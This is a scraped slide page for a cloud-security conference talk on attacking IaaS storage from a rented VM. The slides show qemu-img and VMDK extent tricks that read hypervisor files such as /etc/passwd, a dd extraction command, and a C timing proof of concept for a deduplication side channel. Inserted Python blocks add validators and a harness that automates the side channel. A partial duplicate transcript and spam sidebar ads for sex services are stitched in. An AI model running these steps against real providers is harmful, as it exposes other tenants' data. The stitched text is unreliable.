Hacking Cloud Computing
infrastructures for fun and for profit
Matthieu BOUTHORS
Wednesday, July 11, 12
Plan
• Introduction to cloud computing
• Focus on IaaS
• Targeting data snapshots
• Targeting data dedup
* as a Service
Characteristics
• Agility / Elasticity : everything can be scaled up/down
• APIs : everything can be automated, for more agility
• Reliability / Low maintenance : sharing gives access to state-of-the-art architectures at low cost
• Simplicity : everything is divided into simple pieces (required by the previous points)
Focus on IaaS
• Orchestration from the user down to behind the OS :
– Networking (firewall rules, Elastic IPs, DNS, load balancing, ...)
– Storage (RAW volume creation/deletion, mounts, snapshots, ...)
– Hypervisor (VM lifecycle, sizing, read-only access to the COM port, ...)
• Sounds like something new and interesting
IaaS stack
Cloud Solutions
• Custom orchestration on top of a Xen / Qemu-KVM hypervisor : AWS / Rackspace / ...
• Closed-source all-in-one solutions : VMware (vSphere + vCloud Director), MS (Hyper-V + System Center)
• Open-source all-in-one solutions : OpenStack, Eucalyptus
IaaS Hackers’ objectives
• Almost unlimited network/compute/storage resources for free
• Access to IaaS customers' sensitive data
• Access to IaaS customers' VMs
IaaS attack vectors
• From the Internet
– easiest to perform
– limited attack surface
– hard to find cloud-specific vectors
• Cloud APIs
– web services reachable from the whole Internet
– the best-secured part
– complete access to every IaaS functionality
IaaS attack vectors
• From a VM inside the cloud :
– behind almost all conventional layers of defense
– simple, RAW access to the underlying resources
– almost any tool / custom code can be run on the VM
– restricted to public clouds
“10$ Hack” principles
• Pretend to be a legitimate customer
• Spend a minimum of money thanks to elastic billing
• Abuse a maximum of functionality only accessible to customers
• Very effective against any provider with shared infrastructure
Get close to the target
• Thousands of physical hosts, but you hope to land on the same one as your target
• Host assignment is only an algorithm, tuned with different goals :
– limit host under-utilization
– provide constant performance across all the hosts
– avoid capacity issues
Abuse host assignment
• VMware DRS :
– spawn a lot of VMs and generate heavy load inside them
– the VMs will be migrated to hosts with low usage
– stop generating load on the VMs (they won't be migrated back, but their hosts will be able to accept new busy VMs again)
– start a DoS on the targeted VMs
– the targeted VMs will probably be migrated to a host where you already have a VM
Attacking Storage
Commonly used technologies
• High-performance NAS/SAN
• Custom file formats for RAW disk storage :
– VMDK : VMware
– qcow2 / QED : qemu
– Hyper-V : TODO
• Sometimes a custom FS (VMware VMFS)
Snapshots
• Users tend to create VMs from only a small subset of images
• Duplicating a RAW disk image on each VM creation takes ages
• Users need a way to easily save RAW disk images
• Snapshots solve these problems
Snapshot principles
• The “current” disk is marked read-only
• A new disk is created with the “current” disk as its snapshot ancestor
• New writes go to the new disk
• Reads are served from the new disk only if the block has been rewritten since the snapshot ; otherwise they fall through to the ancestor
Exploiting snapshots
• Control the value of the ancestor
• Restore the snapshot
• Read the content of the chosen
ancestor
qemu-kvm
• Any file can be used as an ancestor with the standard qemu-img binary :
$ qemu-img create -f qcow2 -b /etc/passwd nasty.qed
$ strings nasty.qed
/etc/passwd
$ qemu-img convert -O raw nasty.qed nasty.raw && head -n 3 nasty.raw
# $FreeBSD: release/9.0.0/etc/master.passwd 218047 2011-01-28 22:29:38Z pjd $
#
root:*:0:0:Charlie &:/root:/usr/local/bin/bash
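What `strings nasty.qed` reveals above is the backing-file path stored in the qcow2 header, as an offset/length pair in the fixed header fields. The script below is an added example, not code from the talk: it parses that header directly and refuses an uploaded image that names a backing file, which is the check a provider accepting customer-supplied images should run before qemu ever opens the file. The header layout used (big-endian magic, version, backing_file_offset, backing_file_size, cluster_bits, virtual size) is the documented qcow2 format; `make_header` builds constructed, non-bootable headers for the demonstration, and the whitelist-of-provider-base-images policy in `check_upload` is an assumption, not something the talk specifies.

```python
import struct

QCOW_MAGIC = b"QFI\xfb"
# First 32 bytes of the qcow2 header, big-endian: magic, version,
# backing_file_offset (u64), backing_file_size (u32), cluster_bits, virtual size (u64).
HEADER_FMT = ">4sIQIIQ"
HEADER_LEN = struct.calcsize(HEADER_FMT)
MAX_BACKING_LEN = 1023          # qemu itself rejects longer backing-file names


def parse_qcow2_header(data):
    """Return the fields an upload validator cares about, or raise ValueError."""
    if len(data) < HEADER_LEN or data[:4] != QCOW_MAGIC:
        raise ValueError("not a qcow2 image")
    _, version, bf_off, bf_len, cluster_bits, size = struct.unpack(
        HEADER_FMT, data[:HEADER_LEN])
    if version not in (2, 3):
        raise ValueError("unsupported qcow2 version %d" % version)
    backing = None
    if bf_off:                                   # offset 0 means "no backing file"
        if bf_len == 0 or bf_len > MAX_BACKING_LEN or bf_off + bf_len > len(data):
            raise ValueError("backing-file reference points outside the image data")
        backing = data[bf_off:bf_off + bf_len].decode("utf-8", "replace")
    return {"version": version, "cluster_bits": cluster_bits,
            "virtual_size": size, "backing_file": backing}


def check_upload(data, allowed_backing=()):
    """Assumed policy: a customer image may only reference a provider-owned base
    image listed in allowed_backing, never an arbitrary path on the hypervisor."""
    backing = parse_qcow2_header(data)["backing_file"]
    if backing is None:
        return True, "no backing file"
    if backing in allowed_backing:
        return True, "backing file %r is a provider base image" % backing
    return False, "rejecting image: backing file %r" % backing


def make_header(backing=None, cluster_bits=16, size=1 << 30):
    """Constructed qcow2 v3 header for the demo: real fixed fields, no clusters behind it."""
    path = backing.encode() if backing else b""
    bf_off = 104 if path else 0                  # right after the 104-byte v3 fixed header
    fixed = struct.pack(HEADER_FMT, QCOW_MAGIC, 3, bf_off, len(path), cluster_bits, size)
    return fixed.ljust(104, b"\0") + path


if __name__ == "__main__":
    # Same situation as `qemu-img create -f qcow2 -b /etc/passwd nasty.qed` above.
    hostile = make_header("/etc/passwd")
    print(parse_qcow2_header(hostile))
    print(check_upload(hostile))
    print(check_upload(make_header("debian-base.qcow2"), ("debian-base.qcow2",)))
```

Run it on a real upload with `parse_qcow2_header(open(path, "rb").read(4096))`: only the header region is needed, so the check costs nothing even on multi-gigabyte images.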
VMWare VMDK
• No handy tool like qemu-img
• A virtual disk is usually split into several .vmdk files
• *-flat.vmdk files contain the raw data
• The descriptor .vmdk contains useful information, including the references to the *-flat.vmdk files
Normal .vmdk
# Disk DescriptorFile
version=1
encoding="UTF-8"
CID=b5892a19
parentCID=ffffffff
isNativeSnapshot="no"
createType="vmfs"
# Extent description
RW 33554432 VMFS "debian-test-flat.vmdk"
# The Disk Data Base
#DDB
ddb.virtualHWVersion = "8"
ddb.longContentID = "312b4792544af9a8c959d20eb5892a19"
ddb.uuid = "60 00 C2 9b 32 5e f1 d0-54 b3 29 04 95 51 99 3c"
ddb.geometry.cylinders = "2088"
ddb.geometry.heads = "255"
ddb.geometry.sectors = "63"
ddb.adapterType = "lsilogic"
Modifying the extents
• Works with -flat.vmdk files from other disk images
• Does not seem to work on local text files
• Seems to work on local gz files
.vmdk modified #1
# Disk DescriptorFile
version=1
encoding="UTF-8"
CID=b5892a19
parentCID=ffffffff
isNativeSnapshot="no"
createType="vmfs"
# Extent description
RW 33554432 VMFS "debian-test-flat.vmdk"
RW 0 VMFS "debian-test_1-flat.vmdk"
# The Disk Data Base
#DDB
ddb.virtualHWVersion = "8"
ddb.longContentID = "312b4792544af9a8c959d20eb5892a19"
ddb.uuid = "60 00 C2 9b 32 5e f1 d0-54 b3 29 04 95 51 99 3c"
ddb.geometry.cylinders = "2088"
ddb.geometry.heads = "255"
ddb.geometry.sectors = "63"
ddb.adapterType = "lsilogic"
.vmdk modified #2
# Disk DescriptorFile
version=1
encoding="UTF-8"
CID=b5892a19
parentCID=ffffffff
isNativeSnapshot="no"
createType="vmfs"
# Extent description
RW 33554432 VMFS "debian-test-flat.vmdk"
RW 0 VMFS "/bootbank/state.tgz"
# The Disk Data Base
#DDB
ddb.virtualHWVersion = "8"
ddb.longContentID = "312b4792544af9a8c959d20eb5892a19"
ddb.uuid = "60 00 C2 9b 32 5e f1 d0-54 b3 29 04 95 51 99 3c"
ddb.geometry.cylinders = "2088"
ddb.geometry.heads = "255"
ddb.geometry.sectors = "63"
ddb.adapterType = "lsilogic"
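The two modified descriptors above differ from the normal one only in a single appended extent line, so a provider that accepts customer-supplied VMDKs can catch them by parsing the descriptor before registering the disk. The following script is an added example, not code from the talk: it parses the descriptor text, flags extents that point outside the VM directory, that are not .vmdk files, or that declare a zero length, and computes the sector at which each extent starts inside the guest disk (the value that the `dd skip=` on the next slide has to hit). The sample descriptor is the page's own ".vmdk modified #2" reduced to the relevant lines; the three heuristics are assumptions and would not catch a tampered extent that reuses a plausible name and size.

```python
import re

# One extent line: access, size in 512-byte sectors, type, optional file name, optional offset.
EXTENT_RE = re.compile(
    r'^(RW|RDONLY|NOACCESS)\s+(\d+)\s+(\w+)(?:\s+"([^"]*)")?(?:\s+(\d+))?\s*$')
SECTOR = 512


def parse_descriptor(text):
    """Return (header_keys, extents). Each extent records the sector at which it
    starts inside the virtual disk, which is what dd's skip= has to be."""
    keys, extents, next_sector = {}, [], 0
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = EXTENT_RE.match(line)
        if m:
            access, sectors, etype, fname, _offset = m.groups()
            extents.append({"access": access, "sectors": int(sectors), "type": etype,
                            "filename": fname, "start_sector": next_sector})
            next_sector += int(sectors)
        elif "=" in line:
            key, value = line.split("=", 1)
            keys[key.strip()] = value.strip().strip('"')
    return keys, extents


def suspicious_extents(extents):
    """Heuristics (assumed here) for a descriptor tampered with the way the slides show."""
    findings = []
    for ext in extents:
        name, reasons = ext["filename"], []
        if name is None:                         # e.g. a ZERO extent carries no file name
            continue
        parts = name.replace("\\", "/").split("/")
        if name.startswith("/") or ".." in parts:
            reasons.append("path escapes the VM directory")
        if not name.lower().endswith(".vmdk"):
            reasons.append("extent is not a .vmdk file")
        if ext["sectors"] == 0:
            reasons.append("zero-length extent")
        if reasons:
            findings.append((name, reasons))
    return findings


def extent_byte_offset(extents, filename):
    """Byte offset inside the guest disk at which a given extent becomes readable."""
    for ext in extents:
        if ext["filename"] == filename:
            return ext["start_sector"] * SECTOR
    raise KeyError(filename)


# Descriptor ".vmdk modified #2" from the slides, reduced to the lines that matter.
MODIFIED_2 = """# Disk DescriptorFile
version=1
encoding="UTF-8"
CID=b5892a19
parentCID=ffffffff
createType="vmfs"
# Extent description
RW 33554432 VMFS "debian-test-flat.vmdk"
RW 0 VMFS "/bootbank/state.tgz"
# The Disk Data Base
#DDB
ddb.adapterType = "lsilogic"
"""

if __name__ == "__main__":
    keys, extents = parse_descriptor(MODIFIED_2)
    for name, why in suspicious_extents(extents):
        print("%-28s %s" % (name, "; ".join(why)))
    # The injected extent starts right after the 33554432-sector flat file,
    # which is the skip= value used with dd on the next slide.
    print("leaked extent starts at sector",
          extent_byte_offset(extents, "/bootbank/state.tgz") // SECTOR)
```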
Retrieving data
• The extent is accessible at the end of the disk device
• We only have to skip the beginning of the disk to retrieve the wanted piece of data
• In our case :
dd if=/dev/sda of=leaked_img skip=33554432 bs=512
25+0 records in
25+0 records out
12800 bytes transferred in 0.020000 secs (640001 bytes/sec)
Caveats
• Hard to guess other VMs' .vmdk filenames and paths
• .gz files are truncated to the nearest multiple of 512 bytes
Real-World attack possibilities
• Unlikely to be able to forge these “snapshots” through the API
• Should be really useful when users are able to upload their own images
Deduplication
• Snapshots are not enough to optimize storage usage
• Filers (or file systems like ZFS) provide deduplication of redundant blocks
• Each time two identical blocks are found, one of them is replaced by a reference to the other
• If a deduplicated block is rewritten, the entire block needs to be written
Identify deduplication
• If only one byte is written, the whole deduplicated block needs to be rewritten
• That is a write penalty
• We will conduct timing attacks to detect this penalty
Caveat #1
• Deduplication may be asynchronous
• The attack needs to wait for the deduplication process to occur
• Since deduplication happens only on the filer, the VM does not need to be running while waiting for it ; only the volume needs to remain during the wait
Caveat #2
• Deduplication is filer-centric
• Some filers work at file level on NFS exports => no attack possible
• Blocks may be misaligned between the VM file system and the filer => unlikely to be seen, since this means a severe performance issue ; the cloud provider will work for us and avoid this case
Caveat #3
• OS / file system caches
• Drop the Linux page cache before doing anything else
• Use direct I/O for writes
What exploitation looks like
• Create files that may be deduplicated and random files on your own VM
• Wait (maybe 24 hours if dedup is a daily cron job)
• Flush the Linux file cache
• Write one byte (in practice one aligned sector, the smallest direct-I/O write) at the start of each block (usually 4 KB)
• Compare timings on the random files vs the deduplicated files
Flush Linux file cache
• The cache behaviour of Linux is unpredictable
• We need a tool to show and flush the Linux file cache
• vmtouch is that tool (thanks to hoytech)
• https://github.com/hoytech/vmtouch
Writes and time measurement
• Avoid python/ruby/java/...
• Needs to use direct I/O
• Needs to be far more precise than the UNIX time command (ms precision)
• Solution : a simple C program
.c POC
#define _GNU_SOURCE            /* O_DIRECT is a GNU extension in <fcntl.h> */
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <time.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <inttypes.h>
#include <unistd.h>

/* Difference between two CLOCK_MONOTONIC timestamps, in nanoseconds. */
int64_t timespecDiff(struct timespec *timeA_p, struct timespec *timeB_p)
{
    return ((int64_t)timeA_p->tv_sec * 1000000000LL + timeA_p->tv_nsec) -
           ((int64_t)timeB_p->tv_sec * 1000000000LL + timeB_p->tv_nsec);
}

int main(int argc, char **argv) {
    int f;
    void *buf;
    struct timespec start, end;

    if (argc != 2) { fprintf(stderr, "usage: %s <file>\n", argv[0]); return 1; }
    /* O_DIRECT needs a sector-aligned buffer, offset and length, so the
       smallest write that really bypasses the page cache is one 512-byte
       sector (a 1-byte write fails with EINVAL).  It still touches only part
       of a 4 KB block, which is what forces the copy of a deduplicated block. */
    if (posix_memalign(&buf, 512, 512) != 0) { perror("posix_memalign"); return 1; }
    memset(buf, 'A', 512);
    f = open(argv[1], O_WRONLY | O_DIRECT);
    if (f < 0) { perror("open"); return 1; }
    clock_gettime(CLOCK_MONOTONIC, &start);
    if (write(f, buf, 512) != 512) { perror("write"); return 1; }
    clock_gettime(CLOCK_MONOTONIC, &end);
    printf("%" PRId64 "\n", timespecDiff(&end, &start));
    close(f);
    free(buf);
    return 0;
}
Attacking ZFS dedup
Limitations of this POC
• Only focuses on the first block of a file
• Lack of automation
• Lack of block-size guessing (needed in order to fix the first limitation)
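The C PoC times one write on the first block of one file and leaves the rest of the procedure from the "What exploitation looks like" slide (two file sets, cache flush, per-block writes, comparison) to the operator. The harness below is an added example, not the author's code, and addresses the first two limitations above: it evicts each file from the page cache with the posix_fadvise(DONTNEED) call that vmtouch -e relies on on Linux, rewrites one aligned 512-byte sector at the start of every block through O_DIRECT (a single byte cannot be written with direct I/O, and a partial-block write is what forces the copy of a deduplicated block), and compares median latencies of the dedup candidate against the random file. The 4 KB block size, the 1.5x decision threshold and the zero-filled candidate used by `dry_run()` are assumptions; `time.perf_counter_ns` gives nanosecond-resolution timestamps, though the C PoC remains the better choice where interpreter overhead matters.

```python
import mmap
import os
import statistics
import tempfile
import time

SECTOR = 512                                    # smallest legal O_DIRECT write
O_DIRECT = getattr(os, "O_DIRECT", 0)           # Linux only; 0 falls back to cached I/O


def block_offsets(file_size, block_size=4096):
    """Start offset of every block in the file (the talk's PoC only did the first one)."""
    return list(range(0, file_size, block_size))


def evict_from_page_cache(path):
    """Same effect as `vmtouch -e`: flush dirty pages, then ask the kernel to drop
    the file's cached pages so the next write really reaches the filer."""
    fd = os.open(path, os.O_RDWR)
    try:
        os.fsync(fd)
        if hasattr(os, "posix_fadvise"):
            os.posix_fadvise(fd, 0, 0, os.POSIX_FADV_DONTNEED)
    finally:
        os.close(fd)


def timed_sector_writes(path, block_size=4096, direct=True):
    """Rewrite one aligned sector at the start of every block and return the
    per-block latency in nanoseconds."""
    flags = os.O_WRONLY | (O_DIRECT if direct else 0)
    buf = mmap.mmap(-1, SECTOR)                 # anonymous mmap is page-aligned, as O_DIRECT needs
    buf.write(b"A" * SECTOR)
    fd = os.open(path, flags)
    try:
        timings = []
        for off in block_offsets(os.fstat(fd).st_size, block_size):
            t0 = time.perf_counter_ns()
            os.pwrite(fd, buf, off)             # sector-sized, sector-aligned partial write
            timings.append(time.perf_counter_ns() - t0)
        return timings
    finally:
        os.close(fd)
        buf.close()


def penalty_ratio(candidate_ns, random_ns):
    """Median write latency on the dedup candidate relative to the random file."""
    return statistics.median(candidate_ns) / statistics.median(random_ns)


def looks_deduplicated(candidate_ns, random_ns, threshold=1.5):
    """Assumed decision rule: a median penalty of 1.5x or more is called deduplicated."""
    return penalty_ratio(candidate_ns, random_ns) >= threshold


def compare(candidate_path, random_path, block_size=4096, direct=True):
    """Run the measurement on a file that may be deduplicated and on a random file."""
    for path in (candidate_path, random_path):
        evict_from_page_cache(path)
    cand = timed_sector_writes(candidate_path, block_size, direct)
    rnd = timed_sector_writes(random_path, block_size, direct)
    return {"samples": len(cand),
            "candidate_median_ns": statistics.median(cand),
            "random_median_ns": statistics.median(rnd),
            "ratio": penalty_ratio(cand, rnd),
            "deduplicated": looks_deduplicated(cand, rnd)}


def dry_run(nblocks=4, block_size=4096):
    """Exercise the harness on two throwaway files with cached I/O (no filer, no
    dedup) so the plumbing can be checked before spending the 24-hour wait."""
    with tempfile.TemporaryDirectory() as d:
        cand, rnd = os.path.join(d, "candidate"), os.path.join(d, "random")
        with open(cand, "wb") as f:
            f.write(b"\x00" * (nblocks * block_size))   # constructed: zero-filled, a typical dedup hit
        with open(rnd, "wb") as f:
            f.write(os.urandom(nblocks * block_size))
        return compare(cand, rnd, block_size, direct=False)


if __name__ == "__main__":
    import sys
    if len(sys.argv) == 3:
        print(compare(sys.argv[1], sys.argv[2]))  # candidate file, random file, after the wait
    else:
        print(dry_run())
```

`compare()` is meant to be run on the VM after the deduplication window has passed; a ratio close to 1 on a file you know is duplicated elsewhere is a sign of file-level dedup or block misalignment (caveats #1 and #2), not proof that no dedup is in place.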
Impacts / Counter-measure
• Can be used to find out whether your cloud neighbours have :
– unpatched binaries on their VMs
– files that belong to you (data-leak detection)
• Not limited to VMs : the provider may also have hypervisor data on the filer
• Counter-measure : encrypt all your stuff, so that the same piece of data yields different RAW blocks
Corrupting dedup
• Work in progress :
– generating a collision in the dedup table
– when users try to write a legitimate file, it is deduplicated to your backdoored version
• Difficulties :
– each filer / file system has its own checksum algorithm : you need to gather information about the storage infrastructure
– filers / file systems using a weak checksum usually perform a byte-by-byte comparison before deduplicating (for instance NetApp)
– finding a usable collision on a strong checksum algorithm is really hard (for instance ZFS dedup uses SHA-256)
Denial of Service via Dedup
• Not tested yet
• Only usable against solutions with a weak checksum + byte-by-byte comparison
• Attack scenario :
– generate a maximum of collisions thanks to the weak algorithm
Solutions : Provider side
• Innovative solutions need to be security-assessed more than usual
• Internal security actions need to be publicly known and measurable
• Solutions :
– internal skilled security teams
– certifications and external audit policies
Solutions : Customer/User side
• Customers cannot blindly trust any cloud provider
• Counter-measures are available on the customer side :
– avoid storing sensitive data unencrypted
– add firewall / IDS / IPS directly on the VMs
– assess the quality and reliability of the selected provider
Conclusions
• New technologies bring new threats
• Other attacks are available :
– VM memory overlapping host memory (VMSA-2012-0009.2)
– Xen SYSRET instruction (CVE-2012-0217)
– ...
• New threats do not always mean new ways of fighting them
Questions ?
• Thanks : @hackerzvoice
& @outscale
• Contacts : @majin_boo
CrashFR will never die in our living memories

Salesforce Community Group Quito, Salesforce 101Paola De la Torre
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationRidwan Fadjar
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphNeo4j
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersThousandEyes
 

Dernier (20)

From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC Architecture
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)
 
Maximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxMaximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptx
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
 

NDH2k12 Cloud Computing Security

1. Hacking Cloud Computing infrastructures for fun and for profit
Matthieu BOUTHORS
Wednesday, July 11, 12

2. Plan
• Introduction to cloud computing
• Focus on IaaS
• Targeting data snapshots
• Targeting data dedup

3. * as a Service

4. Characteristics
• Agility / Elasticity: everything can be scaled up/down
• APIs: everything can be automated for more agility
• Reliability / Low maintenance: sharing provides access to state-of-the-art architectures at low cost
• Simplicity: everything is divided into simple pieces (needed by the previous points)

5. Focus on IaaS
• Orchestration from the user to behind the OS:
– Networking (firewall rules, Elastic IPs, DNS, load balancing, ...)
– Storage (RAW volume creation/deletion, mounts, snapshots, ...)
– Hypervisor (VM lifecycle, sizing, RO access to COM port, ...)
• Sounds like something new and interesting

7. Cloud Solutions
• Custom orchestration over Xen / Qemu-KVM hypervisors: AWS / Rackspace / ...
• Closed source all-in-one solutions: VMWare (vSphere + Cloud Director), MS (Hyper-V + System Center)
• Open source all-in-one solutions: OpenStack, Eucalyptus

8. IaaS hackers' objectives
• Almost unlimited network/compute/storage resources for free
• Access to IaaS customers' sensitive pieces of data
• Access to IaaS customers' VMs

9. IaaS attack vectors
• From the Internet
– easiest to perform
– limited attack surface
– hard to find cloud-specific vectors
• Cloud APIs
– web services available from all the Internet
– most secured part
– complete access to each IaaS functionality

10. IaaS attack vectors
• From a VM inside the cloud:
– behind almost all conventional layers of defense
– simple and RAW access to the underlying resources
– almost any tool / custom code can be used on the VM
– restricted to public clouds
11. "10$ Hack" principles
• Pretend to be a legitimate customer
• Spend a minimum of money thanks to elastic billing
• Abuse a maximum of functionality only accessible to customers
• Very effective against all providers with shared infrastructures

12. Get close to the target
• Thousands of physical hosts, but you hope to be on the same one as your target
• Host assignment is only an algorithm, tuned with different goals:
– limit host under-utilization
– provide constant performance across all the hosts
– avoid capacity issues

13. Abuse host assignment
• VMWare DRS:
• spawn a lot of VMs and generate a huge load inside these VMs
• VMs will be migrated to hosts with low usage
• Stop generating load on the VMs (the VMs won't be migrated, but their hosts will be able to accept new busy VMs again)
• Start a DoS on the targeted VMs
• The targeted VMs will probably be migrated to a host where you already have a VM

15. Commonly used technologies
• High-performance NAS/SAN
• Custom file formats for RAW disk storage:
– VMDK: VMWare
– QED: qemu
– TODO Hyper-V
• Sometimes a custom FS (VMWare VMFS)

16. Snapshots
• Users tend to create VMs from only a small subset of images
• Duplicating a RAW disk image on each VM creation takes ages
• Users need a way to easily save RAW disk images
• Snapshots solve these problems

17. Snapshot principles
• The "current" disk is marked as read-only
• A new disk is created with the "current" disk as snapshot ancestor
• New writes are performed on the new disk
• Reads are performed on the new disk only if the block has been rewritten since the snapshot

18. Exploiting snapshots
• Control the value of the ancestor
• Restore the snapshot
• Read the content of the chosen ancestor
19. qemu-kvm
• Any file can be used as an ancestor with the standard qemu-img binary:

    $ qemu-img create -f qcow2 -b /etc/passwd nasty.qed
    $ strings nasty.qed
    /etc/passwd
    $ qemu-img convert -O raw nasty.qed nasty.raw && head -n 3 nasty.raw
    # $FreeBSD: release/9.0.0/etc/master.passwd 218047 2011-01-28 22:29:38Z pjd $
    #
    root:*:0:0:Charlie &:/root:/usr/local/bin/bash

20. VMWare VMDK
• No sexy tool like qemu-img
• A virtual disk is usually split into several .vmdk files
• *-flat.vmdk files contain the raw data
• The .vmdk descriptor contains useful information, including the references to the *-flat.vmdk files

21. Normal .vmdk

    # Disk DescriptorFile
    version=1
    encoding="UTF-8"
    CID=b5892a19
    parentCID=ffffffff
    isNativeSnapshot="no"
    createType="vmfs"

    # Extent description
    RW 33554432 VMFS "debian-test-flat.vmdk"

    # The Disk Data Base
    #DDB

    ddb.virtualHWVersion = "8"
    ddb.longContentID = "312b4792544af9a8c959d20eb5892a19"
    ddb.uuid = "60 00 C2 9b 32 5e f1 d0-54 b3 29 04 95 51 99 3c"
    ddb.geometry.cylinders = "2088"
    ddb.geometry.heads = "255"
    ddb.geometry.sectors = "63"
    ddb.adapterType = "lsilogic"

22. Modifying the extents
• Works with -flat.vmdk files from other disk images
• Does not seem to work on local text files
• Seems to work on local gz files

23. .vmdk modified #1

    # Disk DescriptorFile
    version=1
    encoding="UTF-8"
    CID=b5892a19
    parentCID=ffffffff
    isNativeSnapshot="no"
    createType="vmfs"

    # Extent description
    RW 33554432 VMFS "debian-test-flat.vmdk"
    RW 0 VMFS "debian-test_1-flat.vmdk"

    # The Disk Data Base
    #DDB

    ddb.virtualHWVersion = "8"
    ddb.longContentID = "312b4792544af9a8c959d20eb5892a19"
    ddb.uuid = "60 00 C2 9b 32 5e f1 d0-54 b3 29 04 95 51 99 3c"
    ddb.geometry.cylinders = "2088"
    ddb.geometry.heads = "255"
    ddb.geometry.sectors = "63"
    ddb.adapterType = "lsilogic"

24. .vmdk modified #2

    # Disk DescriptorFile
